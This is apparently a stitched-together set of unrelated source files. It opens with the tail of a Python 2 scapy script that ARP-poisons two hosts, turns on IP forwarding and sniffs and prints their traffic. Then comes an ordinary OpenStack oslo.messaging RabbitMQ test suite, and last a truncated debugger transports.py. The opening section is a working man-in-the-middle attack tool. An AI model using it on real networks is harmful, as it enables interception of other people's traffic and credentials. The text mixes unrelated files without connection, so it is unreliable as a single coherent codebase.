if(Pck.haslayer(Raw)) : print "\nTarget 1 Sent : " + str(Pck.summary()) + " ==> " + str(Pck.getlayer(Raw))
else : print "\nTarget 1 Sent : " + str(Pck.summary())
elif((Pck.getlayer(IP).src == Target2_IP)) :
if(Pck.haslayer(Raw)) : print "\nTarget 2 Sent : " + str(Pck.summary()) + " ==> " + str(Pck.getlayer(Raw))
else : print "\nTarget 2 Sent : " + str(Pck.summary())
def GetMAC(IPAddress) :
MAC = subprocess.Popen(["arp", "-n", IPAddress], stdout=subprocess.PIPE)
MAC = MAC.communicate()[0]
MAC = re.search(r"(([a-f\d]{1,2}\:){5}[a-f\d]{1,2})", MAC).groups()[0]
return MAC
def Sniff() :
print "[*] Sniffing ..."
sniff(iface="eth0", prn=PacketAnalyze)
def MITM(VIP, DIP, VMAC, DMAC) :
Sniff_Thread = threading.Thread(target=Sniff, args=())
Sniff_Thread.start()
print "[*] ARP Poisoning ..."
while(True) :
sendp(Ether(dst=VMAC)/ARP(op=2, psrc=DIP, pdst=VIP, hwdst=VMAC))
sendp(Ether(dst=DMAC)/ARP(op=2, psrc=VIP, pdst=DIP, hwdst=DMAC))
time.sleep(1)
if __name__ == "__main__" :
print "[+] Welcome"
Banner = '''
000 0
0 0 01
1 0 1 0 1
1 0 1 1
1 0 1 1
0 0 1
000 10001
=======================================================
00000
1 1 100001 0000 1 0 00000 1 00000 0 0
1 1 1 1 1 0 1 1 1 1 0 0
00000 00000 0 1 0 1 1 1 1 0
1 1 0 0 1 00000 0 1 1
1 1 1 1 1 0 1 1 0 0 1 1
00000 100001 0000 100001 1 0 0 1 1
'''
print Banner
if(len(sys.argv) != 3):
print "[-] Usage : " + sys.argv[0] + " <Target_1 IPAddress> <Target_2 IPAddress>"
exit(0)
os.system("echo 1 > /proc/sys/net/ipv4/ip_forward")
Target1_IP = sys.argv[1]
Target2_IP = sys.argv[2]
Target1_MAC = GetMAC(Target1_IP)
Target2_MAC = GetMAC(Target2_IP)
MITM(Target1_IP, Target2_IP, Target1_MAC, Target2_MAC)
|
test_impl_rabbit.py
|
# Copyright 2013 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import datetime
import ssl
import sys
import threading
import time
import uuid
import fixtures
import kombu
import kombu.transport.memory
from oslo_config import cfg
from oslo_serialization import jsonutils
import testscenarios
import oslo_messaging
from oslo_messaging._drivers import amqpdriver
from oslo_messaging._drivers import common as driver_common
from oslo_messaging._drivers import impl_rabbit as rabbit_driver
from oslo_messaging.tests import utils as test_utils
from six.moves import mock
load_tests = testscenarios.load_tests_apply_scenarios
class TestDeprecatedRabbitDriverLoad(test_utils.BaseTestCase):
def setUp(self):
super(TestDeprecatedRabbitDriverLoad, self).setUp(
conf=cfg.ConfigOpts())
self.messaging_conf.transport_driver = 'rabbit'
self.config(fake_rabbit=True, group="oslo_messaging_rabbit")
def test_driver_load(self):
transport = oslo_messaging.get_transport(self.conf)
self.addCleanup(transport.cleanup)
driver = transport._driver
url = driver._get_connection()._url
self.assertIsInstance(driver, rabbit_driver.RabbitDriver)
self.assertEqual('memory:////', url)
class TestHeartbeat(test_utils.BaseTestCase):
@mock.patch('oslo_messaging._drivers.impl_rabbit.LOG')
@mock.patch('kombu.connection.Connection.heartbeat_check')
@mock.patch('oslo_messaging._drivers.impl_rabbit.Connection.'
'_heartbeat_supported_and_enabled', return_value=True)
@mock.patch('oslo_messaging._drivers.impl_rabbit.Connection.'
'ensure_connection')
def _do_test_heartbeat_sent(self, fake_ensure_connection,
fake_heartbeat_support, fake_heartbeat,
fake_logger, heartbeat_side_effect=None,
info=None):
event = threading.Event()
def heartbeat_check(rate=2):
event.set()
if heartbeat_side_effect:
raise heartbeat_side_effect
fake_heartbeat.side_effect = heartbeat_check
transport = oslo_messaging.get_transport(self.conf,
'kombu+memory:////')
self.addCleanup(transport.cleanup)
conn = transport._driver._get_connection()
conn.ensure(method=lambda: True)
event.wait()
conn._heartbeat_stop()
# check heartbeat have been called
self.assertLess(0, fake_heartbeat.call_count)
if not heartbeat_side_effect:
self.assertEqual(1, fake_ensure_connection.call_count)
self.assertEqual(2, fake_logger.debug.call_count)
self.assertEqual(0, fake_logger.info.call_count)
else:
self.assertEqual(2, fake_ensure_connection.call_count)
self.assertEqual(2, fake_logger.debug.call_count)
self.assertEqual(1, fake_logger.info.call_count)
self.assertIn(mock.call(info, mock.ANY),
fake_logger.info.mock_calls)
def test_test_heartbeat_sent_default(self):
self._do_test_heartbeat_sent()
def test_test_heartbeat_sent_connection_fail(self):
self._do_test_heartbeat_sent(
heartbeat_side_effect=kombu.exceptions.OperationalError,
info='A recoverable connection/channel error occurred, '
'trying to reconnect: %s')
class TestRabbitQos(test_utils.BaseTestCase):
def connection_with(self, prefetch, purpose):
self.config(rabbit_qos_prefetch_count=prefetch,
group="oslo_messaging_rabbit")
transport = oslo_messaging.get_transport(self.conf,
'kombu+memory:////')
transport._driver._get_connection(purpose)
@mock.patch('kombu.transport.memory.Channel.basic_qos')
def test_qos_sent_on_listen_connection(self, fake_basic_qos):
self.connection_with(prefetch=1, purpose=driver_common.PURPOSE_LISTEN)
fake_basic_qos.assert_called_once_with(0, 1, False)
@mock.patch('kombu.transport.memory.Channel.basic_qos')
def test_qos_not_sent_when_cfg_zero(self, fake_basic_qos):
self.connection_with(prefetch=0, purpose=driver_common.PURPOSE_LISTEN)
fake_basic_qos.assert_not_called()
@mock.patch('kombu.transport.memory.Channel.basic_qos')
def test_qos_not_sent_on_send_connection(self, fake_basic_qos):
self.connection_with(prefetch=1, purpose=driver_common.PURPOSE_SEND)
fake_basic_qos.assert_not_called()
class TestRabbitDriverLoad(test_utils.BaseTestCase):
scenarios = [
('rabbit', dict(transport_driver='rabbit',
url='amqp://guest:guest@localhost:5672//')),
('kombu', dict(transport_driver='kombu',
url='amqp://guest:guest@localhost:5672//')),
('rabbit+memory', dict(transport_driver='kombu+memory',
url='memory:///'))
]
@mock.patch('oslo_messaging._drivers.impl_rabbit.Connection.ensure')
@mock.patch('oslo_messaging._drivers.impl_rabbit.Connection.reset')
def test_driver_load(self, fake_ensure, fake_reset):
self.config(heartbeat_timeout_threshold=60,
group='oslo_messaging_rabbit')
self.messaging_conf.transport_driver = self.transport_driver
transport = oslo_messaging.get_transport(self.conf)
self.addCleanup(transport.cleanup)
driver = transport._driver
url = driver._get_connection()._url
self.assertIsInstance(driver, rabbit_driver.RabbitDriver)
self.assertEqual(self.url, url)
class TestRabbitDriverLoadSSL(test_utils.BaseTestCase):
scenarios = [
('no_ssl', dict(options=dict(), expected=False)),
('no_ssl_with_options', dict(options=dict(ssl_version='TLSv1'),
expected=False)),
('just_ssl', dict(options=dict(ssl=True),
expected=True)),
('ssl_with_options', dict(options=dict(ssl=True,
ssl_version='TLSv1',
ssl_key_file='foo',
ssl_cert_file='bar',
ssl_ca_file='foobar'),
expected=dict(ssl_version=3,
keyfile='foo',
certfile='bar',
ca_certs='foobar',
cert_reqs=ssl.CERT_REQUIRED))),
]
@mock.patch('oslo_messaging._drivers.impl_rabbit.Connection.ensure')
@mock.patch('kombu.connection.Connection')
def test_driver_load(self, connection_klass, fake_ensure):
self.config(group="oslo_messaging_rabbit", **self.options)
transport = oslo_messaging.get_transport(self.conf,
'kombu+memory:////')
self.addCleanup(transport.cleanup)
connection = transport._driver._get_connection()
connection_klass.assert_called_once_with(
'memory:///', transport_options={
'client_properties': {
'capabilities': {
'connection.blocked': True,
'consumer_cancel_notify': True,
'authentication_failure_close': True,
},
'connection_name': connection.name},
'confirm_publish': True,
'on_blocked': mock.ANY,
'on_unblocked': mock.ANY},
ssl=self.expected, login_method='AMQPLAIN',
heartbeat=60, failover_strategy='round-robin'
)
class TestRabbitPublisher(test_utils.BaseTestCase):
@mock.patch('kombu.messaging.Producer.publish')
def test_send_with_timeout(self, fake_publish):
transport = oslo_messaging.get_transport(self.conf,
'kombu+memory:////')
exchange_mock = mock.Mock()
with transport._driver._get_connection(
driver_common.PURPOSE_SEND) as pool_conn:
conn = pool_conn.connection
conn._publish(exchange_mock, 'msg', routing_key='routing_key',
timeout=1)
fake_publish.assert_called_with(
'msg', expiration=1,
exchange=exchange_mock,
compression=self.conf.oslo_messaging_rabbit.kombu_compression,
routing_key='routing_key')
@mock.patch('kombu.messaging.Producer.publish')
def test_send_no_timeout(self, fake_publish):
transport = oslo_messaging.get_transport(self.conf,
'kombu+memory:////')
exchange_mock = mock.Mock()
with transport._driver._get_connection(
driver_common.PURPOSE_SEND) as pool_conn:
conn = pool_conn.connection
conn._publish(exchange_mock, 'msg', routing_key='routing_key')
fake_publish.assert_called_with(
'msg', expiration=None,
compression=self.conf.oslo_messaging_rabbit.kombu_compression,
exchange=exchange_mock,
routing_key='routing_key')
def test_declared_queue_publisher(self):
transport = oslo_messaging.get_transport(self.conf,
'kombu+memory:////')
self.addCleanup(transport.cleanup)
e_passive = kombu.entity.Exchange(
name='foobar',
type='topic',
passive=True)
e_active = kombu.entity.Exchange(
name='foobar',
type='topic',
passive=False)
with transport._driver._get_connection(
driver_common.PURPOSE_SEND) as pool_conn:
conn = pool_conn.connection
exc = conn.connection.channel_errors[0]
def try_send(exchange):
conn._ensure_publishing(
conn._publish_and_creates_default_queue,
exchange, {}, routing_key='foobar')
with mock.patch('kombu.transport.virtual.Channel.close'):
# Ensure the exchange does not exists
self.assertRaises(oslo_messaging.MessageDeliveryFailure,
try_send, e_passive)
# Create it
try_send(e_active)
# Ensure it creates it
try_send(e_passive)
with mock.patch('kombu.messaging.Producer.publish',
side_effect=exc):
with mock.patch('kombu.transport.virtual.Channel.close'):
# Ensure the exchange is already in cache
self.assertIn('foobar', conn._declared_exchanges)
# Reset connection
self.assertRaises(oslo_messaging.MessageDeliveryFailure,
try_send, e_passive)
# Ensure the cache is empty
self.assertEqual(0, len(conn._declared_exchanges))
try_send(e_active)
self.assertIn('foobar', conn._declared_exchanges)
class TestRabbitConsume(test_utils.BaseTestCase):
def test_consume_timeout(self):
transport = oslo_messaging.get_transport(self.conf,
'kombu+memory:////')
self.addCleanup(transport.cleanup)
deadline = time.time() + 6
with transport._driver._get_connection(
driver_common.PURPOSE_LISTEN) as conn:
self.assertRaises(driver_common.Timeout,
conn.consume, timeout=3)
# kombu memory transport doesn't really raise error
# so just simulate a real driver behavior
conn.connection.connection.recoverable_channel_errors = (IOError,)
conn.declare_fanout_consumer("notif.info", lambda msg: True)
with mock.patch('kombu.connection.Connection.drain_events',
side_effect=IOError):
self.assertRaises(driver_common.Timeout,
conn.consume, timeout=3)
self.assertEqual(0, int(deadline - time.time()))
def test_consume_from_missing_queue(self):
transport = oslo_messaging.get_transport(self.conf, 'kombu+memory://')
self.addCleanup(transport.cleanup)
with transport._driver._get_connection(
driver_common.PURPOSE_LISTEN) as conn:
with mock.patch('kombu.Queue.consume') as consume, mock.patch(
'kombu.Queue.declare') as declare:
conn.declare_topic_consumer(exchange_name='test',
topic='test',
callback=lambda msg: True)
import amqp
consume.side_effect = [amqp.NotFound, None]
conn.connection.connection.recoverable_connection_errors = ()
conn.connection.connection.recoverable_channel_errors = ()
self.assertEqual(1, declare.call_count)
conn.connection.connection.drain_events = mock.Mock()
# Ensure that a queue will be re-declared if the consume method
# of kombu.Queue raise amqp.NotFound
conn.consume()
self.assertEqual(2, declare.call_count)
def test_consume_from_missing_queue_with_io_error_on_redeclaration(self):
transport = oslo_messaging.get_transport(self.conf, 'kombu+memory://')
self.addCleanup(transport.cleanup)
with transport._driver._get_connection(
driver_common.PURPOSE_LISTEN) as conn:
with mock.patch('kombu.Queue.consume') as consume, mock.patch(
'kombu.Queue.declare') as declare:
conn.declare_topic_consumer(exchange_name='test',
topic='test',
callback=lambda msg: True)
import amqp
consume.side_effect = [amqp.NotFound, None]
declare.side_effect = [IOError, None]
conn.connection.connection.recoverable_connection_errors = (
IOError,)
conn.connection.connection.recoverable_channel_errors = ()
self.assertEqual(1, declare.call_count)
conn.connection.connection.drain_events = mock.Mock()
                # Ensure that a queue will be re-declared after a
                # 'queue not found' exception despite a connection error.
conn.consume()
self.assertEqual(3, declare.call_count)
def test_connection_ack_have_disconnected_kombu_connection(self):
transport = oslo_messaging.get_transport(self.conf,
'kombu+memory:////')
self.addCleanup(transport.cleanup)
with transport._driver._get_connection(
driver_common.PURPOSE_LISTEN) as conn:
channel = conn.connection.channel
with mock.patch('kombu.connection.Connection.connected',
new_callable=mock.PropertyMock,
return_value=False):
self.assertRaises(driver_common.Timeout,
conn.connection.consume, timeout=0.01)
                # Ensure a new channel has been set up
self.assertNotEqual(channel, conn.connection.channel)
class TestRabbitTransportURL(test_utils.BaseTestCase):
scenarios = [
('none', dict(url=None,
expected=["amqp://guest:guest@localhost:5672//"])),
('memory', dict(url='kombu+memory:////',
expected=["memory:///"])),
('empty',
dict(url='rabbit:///',
expected=['amqp://guest:guest@localhost:5672/'])),
('localhost',
dict(url='rabbit://localhost/',
expected=['amqp://:@localhost:5672/'])),
('virtual_host',
dict(url='rabbit:///vhost',
expected=['amqp://guest:guest@localhost:5672/vhost'])),
('no_creds',
dict(url='rabbit://host/virtual_host',
expected=['amqp://:@host:5672/virtual_host'])),
('no_port',
dict(url='rabbit://user:password@host/virtual_host',
expected=['amqp://user:password@host:5672/virtual_host'])),
('full_url',
dict(url='rabbit://user:password@host:10/virtual_host',
expected=['amqp://user:password@host:10/virtual_host'])),
('full_two_url',
dict(url='rabbit://user:password@host:10,'
'user2:password2@host2:12/virtual_host',
expected=["amqp://user:password@host:10/virtual_host",
"amqp://user2:password2@host2:12/virtual_host"]
)),
('rabbit_ipv6',
dict(url='rabbit://u:p@[fd00:beef:dead:55::133]:10/vhost',
expected=['amqp://u:p@[fd00:beef:dead:55::133]:10/vhost'])),
('rabbit_ipv4',
dict(url='rabbit://user:password@10.20.30.40:10/vhost',
expected=['amqp://user:password@10.20.30.40:10/vhost'])),
]
def setUp(self):
super(TestRabbitTransportURL, self).setUp()
self.messaging_conf.transport_driver = 'rabbit'
self.config(heartbeat_timeout_threshold=0,
group='oslo_messaging_rabbit')
@mock.patch('oslo_messaging._drivers.impl_rabbit.Connection.ensure')
@mock.patch('oslo_messaging._drivers.impl_rabbit.Connection.reset')
def test_transport_url(self, fake_reset, fake_ensure):
transport = oslo_messaging.get_transport(self.conf, self.url)
self.addCleanup(transport.cleanup)
driver = transport._driver
urls = driver._get_connection()._url.split(";")
self.assertEqual(sorted(self.expected), sorted(urls))
class TestSendReceive(test_utils.BaseTestCase):
_n_senders = [
('single_sender', dict(n_senders=1)),
('multiple_senders', dict(n_senders=10)),
]
_context = [
('empty_context', dict(ctxt={})),
('with_context', dict(ctxt={'user': 'mark'})),
]
_reply = [
('rx_id', dict(rx_id=True, reply=None)),
('none', dict(rx_id=False, reply=None)),
('empty_list', dict(rx_id=False, reply=[])),
('empty_dict', dict(rx_id=False, reply={})),
('false', dict(rx_id=False, reply=False)),
('zero', dict(rx_id=False, reply=0)),
]
_failure = [
('success', dict(failure=False)),
('failure', dict(failure=True, expected=False)),
('expected_failure', dict(failure=True, expected=True)),
]
_timeout = [
('no_timeout', dict(timeout=None)),
('timeout', dict(timeout=0.01)), # FIXME(markmc): timeout=0 is broken?
]
@classmethod
def generate_scenarios(cls):
cls.scenarios = testscenarios.multiply_scenarios(cls._n_senders,
cls._context,
cls._reply,
cls._failure,
cls._timeout)
def test_send_receive(self):
self.config(kombu_missing_consumer_retry_timeout=0.5,
group="oslo_messaging_rabbit")
self.config(heartbeat_timeout_threshold=0,
group="oslo_messaging_rabbit")
transport = oslo_messaging.get_transport(self.conf,
'kombu+memory:////')
self.addCleanup(transport.cleanup)
driver = transport._driver
target = oslo_messaging.Target(topic='testtopic')
listener = driver.listen(target, None, None)._poll_style_listener
senders = []
replies = []
msgs = []
def send_and_wait_for_reply(i):
try:
timeout = self.timeout
replies.append(driver.send(target,
self.ctxt,
{'tx_id': i},
wait_for_reply=True,
timeout=timeout))
self.assertFalse(self.failure)
self.assertIsNone(self.timeout)
except (ZeroDivisionError, oslo_messaging.MessagingTimeout) as e:
replies.append(e)
self.assertTrue(self.failure or self.timeout is not None)
while len(senders) < self.n_senders:
senders.append(threading.Thread(target=send_and_wait_for_reply,
args=(len(senders), )))
for i in range(len(senders)):
senders[i].start()
received = listener.poll()[0]
self.assertIsNotNone(received)
self.assertEqual(self.ctxt, received.ctxt)
self.assertEqual({'tx_id': i}, received.message)
msgs.append(received)
        # reply in reverse order, except reply to the first sender second from last
order = list(range(len(senders) - 1, -1, -1))
if len(order) > 1:
order[-1], order[-2] = order[-2], order[-1]
for i in order:
if self.timeout is None:
if self.failure:
try:
raise ZeroDivisionError
except Exception:
failure = sys.exc_info()
msgs[i].reply(failure=failure)
elif self.rx_id:
msgs[i].reply({'rx_id': i})
else:
msgs[i].reply(self.reply)
senders[i].join()
self.assertEqual(len(senders), len(replies))
for i, reply in enumerate(replies):
if self.timeout is not None:
self.assertIsInstance(reply, oslo_messaging.MessagingTimeout)
elif self.failure:
self.assertIsInstance(reply, ZeroDivisionError)
elif self.rx_id:
self.assertEqual({'rx_id': order[i]}, reply)
else:
self.assertEqual(self.reply, reply)
TestSendReceive.generate_scenarios()
class TestPollAsync(test_utils.BaseTestCase):
def test_poll_timeout(self):
transport = oslo_messaging.get_transport(self.conf,
'kombu+memory:////')
self.addCleanup(transport.cleanup)
driver = transport._driver
target = oslo_messaging.Target(topic='testtopic')
listener = driver.listen(target, None, None)._poll_style_listener
received = listener.poll(timeout=0.050)
self.assertEqual([], received)
class TestRacyWaitForReply(test_utils.BaseTestCase):
def test_send_receive(self):
transport = oslo_messaging.get_transport(self.conf,
'kombu+memory:////')
self.addCleanup(transport.cleanup)
driver = transport._driver
target = oslo_messaging.Target(topic='testtopic')
listener = driver.listen(target, None, None)._poll_style_listener
senders = []
replies = []
msgs = []
wait_conditions = []
orig_reply_waiter = amqpdriver.ReplyWaiter.wait
def reply_waiter(self, msg_id, timeout):
if wait_conditions:
cond = wait_conditions.pop()
with cond:
cond.notify()
with cond:
cond.wait()
return orig_reply_waiter(self, msg_id, timeout)
self.useFixture(fixtures.MockPatchObject(
amqpdriver.ReplyWaiter, 'wait', reply_waiter))
def send_and_wait_for_reply(i, wait_for_reply):
replies.append(driver.send(target,
{},
{'tx_id': i},
wait_for_reply=wait_for_reply,
timeout=None))
while len(senders) < 2:
t = threading.Thread(target=send_and_wait_for_reply,
args=(len(senders), True))
t.daemon = True
senders.append(t)
        # test the case when msg_id is not set
t = threading.Thread(target=send_and_wait_for_reply,
args=(len(senders), False))
t.daemon = True
senders.append(t)
# Start the first guy, receive his message, but delay his polling
notify_condition = threading.Condition()
wait_conditions.append(notify_condition)
with notify_condition:
senders[0].start()
notify_condition.wait()
msgs.extend(listener.poll())
self.assertEqual({'tx_id': 0}, msgs[-1].message)
# Start the second guy, receive his message
senders[1].start()
msgs.extend(listener.poll())
self.assertEqual({'tx_id': 1}, msgs[-1].message)
# Reply to both in order, making the second thread queue
# the reply meant for the first thread
msgs[0].reply({'rx_id': 0})
msgs[1].reply({'rx_id': 1})
# Wait for the second thread to finish
senders[1].join()
# Start the 3rd guy, receive his message
senders[2].start()
msgs.extend(listener.poll())
self.assertEqual({'tx_id': 2}, msgs[-1].message)
# Verify the _send_reply was not invoked by driver:
with mock.patch.object(msgs[2], '_send_reply') as method:
msgs[2].reply({'rx_id': 2})
self.assertEqual(0, method.call_count)
# Wait for the 3rd thread to finish
senders[2].join()
# Let the first thread continue
with notify_condition:
notify_condition.notify()
# Wait for the first thread to finish
senders[0].join()
# Verify replies were received out of order
self.assertEqual(len(senders), len(replies))
self.assertEqual({'rx_id': 1}, replies[0])
self.assertIsNone(replies[1])
self.assertEqual({'rx_id': 0}, replies[2])
def _declare_queue(target):
connection = kombu.connection.BrokerConnection(transport='memory')
# Kludge to speed up tests.
connection.transport.polling_interval = 0.0
connection.connect()
channel = connection.channel()
# work around 'memory' transport bug in 1.1.3
channel._new_queue('ae.undeliver')
if target.fanout:
exchange = kombu.entity.Exchange(name=target.topic + '_fanout',
type='fanout',
durable=False,
auto_delete=True)
queue = kombu.entity.Queue(name=target.topic + '_fanout_12345',
channel=channel,
exchange=exchange,
routing_key=target.topic)
elif target.server:
exchange = kombu.entity.Exchange(name='openstack',
type='topic',
durable=False,
auto_delete=False)
topic = '%s.%s' % (target.topic, target.server)
queue = kombu.entity.Queue(name=topic,
channel=channel,
exchange=exchange,
routing_key=topic)
else:
exchange = kombu.entity.Exchange(name='openstack',
type='topic',
durable=False,
auto_delete=False)
queue = kombu.entity.Queue(name=target.topic,
channel=channel,
exchange=exchange,
routing_key=target.topic)
queue.declare()
return connection, channel, queue
class TestRequestWireFormat(test_utils.BaseTestCase):
_target = [
('topic_target',
dict(topic='testtopic', server=None, fanout=False)),
('server_target',
dict(topic='testtopic', server='testserver', fanout=False)),
('fanout_target',
dict(topic='testtopic', server=None, fanout=True)),
]
_msg = [
('empty_msg',
dict(msg={}, expected={})),
('primitive_msg',
dict(msg={'foo': 'bar'}, expected={'foo': 'bar'})),
('complex_msg',
dict(msg={'a': {'b': datetime.datetime(1920, 2, 3, 4, 5, 6, 7)}},
expected={'a': {'b': '1920-02-03T04:05:06.000007'}})),
]
_context = [
('empty_ctxt', dict(ctxt={}, expected_ctxt={})),
('user_project_ctxt',
dict(ctxt={'user': 'mark', 'project': 'snarkybunch'},
expected_ctxt={'_context_user': 'mark',
'_context_project': 'snarkybunch'})),
]
_compression = [
('gzip_compression', dict(compression='gzip')),
('without_compression', dict(compression=None))
]
@classmethod
def generate_scenarios(cls):
cls.scenarios = testscenarios.multiply_scenarios(cls._msg,
cls._context,
cls._target,
cls._compression)
def setUp(self):
super(TestRequestWireFormat, self).setUp()
self.uuids = []
self.orig_uuid4 = uuid.uuid4
self.useFixture(fixtures.MonkeyPatch('uuid.uuid4', self.mock_uuid4))
def mock_uuid4(self):
self.uuids.append(self.orig_uuid4())
return self.uuids[-1]
def test_request_wire_format(self):
self.conf.oslo_messaging_rabbit.kombu_compression = self.compression
transport = oslo_messaging.get_transport(self.conf,
'kombu+memory:////')
self.addCleanup(transport.cleanup)
driver = transport._driver
target = oslo_messaging.Target(topic=self.topic,
server=self.server,
fanout=self.fanout)
connection, channel, queue = _declare_queue(target)
self.addCleanup(connection.release)
driver.send(target, self.ctxt, self.msg)
msgs = []
def callback(msg):
msg = channel.message_to_python(msg)
msg.ack()
msgs.append(msg.payload)
queue.consume(callback=callback,
consumer_tag='1',
nowait=False)
connection.drain_events()
self.assertEqual(1, len(msgs))
self.assertIn('oslo.message', msgs[0])
received = msgs[0]
received['oslo.message'] = jsonutils.loads(received['oslo.message'])
# FIXME(markmc): add _msg_id and _reply_q check
expected_msg = {
'_unique_id': self.uuids[0].hex,
}
expected_msg.update(self.expected)
expected_msg.update(self.expected_ctxt)
expected = {
'oslo.version': '2.0',
'oslo.message': expected_msg,
}
self.assertEqual(expected, received)
TestRequestWireFormat.generate_scenarios()
def _create_producer(target):
connection = kombu.connection.BrokerConnection(transport='memory')
# Kludge to speed up tests.
connection.transport.polling_interval = 0.0
connection.connect()
channel = connection.channel()
# work around 'memory' transport bug in 1.1.3
channel._new_queue('ae.undeliver')
if target.fanout:
exchange = kombu.entity.Exchange(name=target.topic + '_fanout',
type='fanout',
durable=False,
auto_delete=True)
producer = kombu.messaging.Producer(exchange=exchange,
channel=channel,
routing_key=target.topic)
elif target.server:
exchange = kombu.entity.Exchange(name='openstack',
type='topic',
durable=False,
auto_delete=False)
topic = '%s.%s' % (target.topic, target.server)
producer = kombu.messaging.Producer(exchange=exchange,
channel=channel,
routing_key=topic)
else:
exchange = kombu.entity.Exchange(name='openstack',
type='topic',
durable=False,
auto_delete=False)
producer = kombu.messaging.Producer(exchange=exchange,
channel=channel,
routing_key=target.topic)
return connection, producer
class TestReplyWireFormat(test_utils.BaseTestCase):
_target = [
('topic_target',
dict(topic='testtopic', server=None, fanout=False)),
('server_target',
dict(topic='testtopic', server='testserver', fanout=False)),
('fanout_target',
dict(topic='testtopic', server=None, fanout=True)),
]
_msg = [
('empty_msg',
dict(msg={}, expected={})),
('primitive_msg',
dict(msg={'foo': 'bar'}, expected={'foo': 'bar'})),
('complex_msg',
dict(msg={'a': {'b': '1920-02-03T04:05:06.000007'}},
expected={'a': {'b': '1920-02-03T04:05:06.000007'}})),
]
_context = [
('empty_ctxt', dict(ctxt={}, expected_ctxt={})),
('user_project_ctxt',
dict(ctxt={'_context_user': 'mark',
'_context_project': 'snarkybunch'},
expected_ctxt={'user': 'mark', 'project': 'snarkybunch'})),
]
_compression = [
('gzip_compression', dict(compression='gzip')),
('without_compression', dict(compression=None))
]
@classmethod
def generate_scenarios(cls):
cls.scenarios = testscenarios.multiply_scenarios(cls._msg,
cls._context,
cls._target,
cls._compression)
def test_reply_wire_format(self):
self.conf.oslo_messaging_rabbit.kombu_compression = self.compression
transport = oslo_messaging.get_transport(self.conf,
'kombu+memory:////')
self.addCleanup(transport.cleanup)
driver = transport._driver
target = oslo_messaging.Target(topic=self.topic,
server=self.server,
fanout=self.fanout)
listener = driver.listen(target, None, None)._poll_style_listener
connection, producer = _create_producer(target)
self.addCleanup(connection.release)
msg = {
'oslo.version': '2.0',
'oslo.message': {}
}
msg['oslo.message'].update(self.msg)
msg['oslo.message'].update(self.ctxt)
msg['oslo.message'].update({
'_msg_id': uuid.uuid4().hex,
'_unique_id': uuid.uuid4().hex,
'_reply_q': 'reply_' + uuid.uuid4().hex,
})
msg['oslo.message'] = jsonutils.dumps(msg['oslo.message'])
producer.publish(msg)
received = listener.poll()[0]
self.assertIsNotNone(received)
self.assertEqual(self.expected_ctxt, received.ctxt)
self.assertEqual(self.expected, received.message)
TestReplyWireFormat.generate_scenarios()
class RpcKombuHATestCase(test_utils.BaseTestCase):
def setUp(self):
super(RpcKombuHATestCase, self).setUp()
self.brokers = ['host1', 'host2', 'host3', 'host4', 'host5']
self.config(rabbit_hosts=self.brokers,
rabbit_retry_interval=0.01,
rabbit_retry_backoff=0.01,
kombu_reconnect_delay=0,
heartbeat_timeout_threshold=0,
group="oslo_messaging_rabbit")
self.useFixture(fixtures.MockPatch(
'kombu.connection.Connection.connection'))
self.useFixture(fixtures.MockPatch(
'kombu.connection.Connection.channel'))
# starting from the first broker in the list
url = oslo_messaging.TransportURL.parse(self.conf, None)
self.connection = rabbit_driver.Connection(self.conf, url,
driver_common.PURPOSE_SEND)
self.kombu_connect = mock.Mock()
self.useFixture(fixtures.MockPatch(
'kombu.connection.Connection.connect',
side_effect=self.kombu_connect))
self.addCleanup(self.connection.close)
def test_ensure_four_retry(self):
mock_callback = mock.Mock(side_effect=IOError)
self.assertRaises(oslo_messaging.MessageDeliveryFailure,
self.connection.ensure, mock_callback,
retry=4)
self.assertEqual(5, self.kombu_connect.call_count)
self.assertEqual(6, mock_callback.call_count)
def test_ensure_one_retry(self):
mock_callback = mock.Mock(side_effect=IOError)
self.assertRaises(oslo_messaging.MessageDeliveryFailure,
self.connection.ensure, mock_callback,
retry=1)
self.assertEqual(2, self.kombu_connect.call_count)
self.assertEqual(3, mock_callback.call_count)
def test_ensure_no_retry(self):
mock_callback = mock.Mock(side_effect=IOError)
self.assertRaises(oslo_messaging.MessageDeliveryFailure,
self.connection.ensure, mock_callback,
retry=0)
self.assertEqual(1, self.kombu_connect.call_count)
self.assertEqual(2, mock_callback.call_count)
class ConnectionLockTestCase(test_utils.BaseTestCase):
def _thread(self, lock, sleep, heartbeat=False):
def thread_task():
if heartbeat:
with lock.for_heartbeat():
time.sleep(sleep)
else:
with lock:
time.sleep(sleep)
t = threading.Thread(target=thread_task)
t.daemon = True
t.start()
start = time.time()
def get_elapsed_time():
t.join()
return time.time() - start
return get_elapsed_time
def test_workers_only(self):
l = rabbit_driver.ConnectionLock()
t1 = self._thread(l, 1)
t2 = self._thread(l, 1)
self.assertAlmostEqual(1, t1(), places=0)
self.assertAlmostEqual(2, t2(), places=0)
def test_worker_and_heartbeat(self):
l = rabbit_driver.ConnectionLock()
t1 = self._thread(l, 1)
t2 = self._thread(l, 1, heartbeat=True)
self.assertAlmostEqual(1, t1(), places=0)
self.assertAlmostEqual(2, t2(), places=0)
def test_workers_and_heartbeat(self):
l = rabbit_driver.ConnectionLock()
t1 = self._thread(l, 1)
t2 = self._thread(l, 1)
t3 = self._thread(l, 1)
t4 = self._thread(l, 1, heartbeat=True)
t5 = self._thread(l, 1)
self.assertAlmostEqual(1, t1(), places=0)
self.assertAlmostEqual(2, t4(), places=0)
self.assertAlmostEqual(3, t2(), places=0)
self.assertAlmostEqual(4, t3(), places=0)
self.assertAlmostEqual(5, t5(), places=0)
def test_heartbeat(self):
l = rabbit_driver.ConnectionLock()
t1 = self._thread(l, 1, heartbeat=True)
t2 = self._thread(l, 1)
self.assertAlmostEqual(1, t1(), places=0)
self.assertAlmostEqual(2, t2(), places=0)
|
transports.py
|
from ...typecheck import *
from ...import core
from ...dap import Transport
import socket
import os
import subprocess
import threading
class Process:
@staticmethod
async def check_output(command: List[str], cwd: Optional[str] = None) -> bytes:
return await core.run_in_executor(lambda: subprocess.check_output(command, cwd=cwd))
def __init__(self, command: List[str], cwd: Optional[str]):
# taken from Default/exec.py
# Hide the console window on Windows
startupinfo = None
if os.name == "nt":
startupinfo = subprocess.STARTUPINFO() #type: ignore
